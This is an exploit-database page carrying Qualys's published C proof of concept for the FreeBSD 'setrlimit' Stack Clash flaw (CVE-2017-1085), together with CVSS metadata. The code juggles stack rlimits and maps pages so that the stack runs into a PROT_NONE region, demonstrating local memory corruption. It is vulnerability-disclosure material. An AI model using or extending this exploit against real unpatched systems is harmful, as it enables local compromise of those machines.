FreeBSD 'setrlimit' Stack Clash Proof of Concept

2017.06.29
Credit: Qualys
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* * FreeBSD_CVE-2017-1085.c * Copyright (C) 2017 Qualys, Inc. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/resource.h> #include <sys/time.h> #include <unistd.h> #define die() do { \ fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \ exit(EXIT_FAILURE); \ } while (0) int main(const int argc, char * const argv[]) { static const struct rlimit core; if (setrlimit(RLIMIT_CORE, &core)) die(); struct rlimit stack; if (getrlimit(RLIMIT_STACK, &stack)) die(); if (stack.rlim_cur > stack.rlim_max / 3) { stack.rlim_cur = stack.rlim_max / 3; if (setrlimit(RLIMIT_STACK, &stack)) die(); execve(*argv, argv, NULL); die(); } char * prot_none = NULL; for (;;) { prot_none = mmap(NULL, 4096, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (prot_none == MAP_FAILED) die(); if ((uintptr_t)&stack < (uintptr_t)prot_none) die(); if ((uintptr_t)&stack - (uintptr_t)prot_none < stack.rlim_max / 3 * 2) break; } if (argc > 1) { stack.rlim_cur = stack.rlim_max; if (setrlimit(RLIMIT_STACK, &stack)) die(); } *prot_none = 'A'; printf("char at %p: %02x\n", prot_none, *prot_none); exit(EXIT_SUCCESS); }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top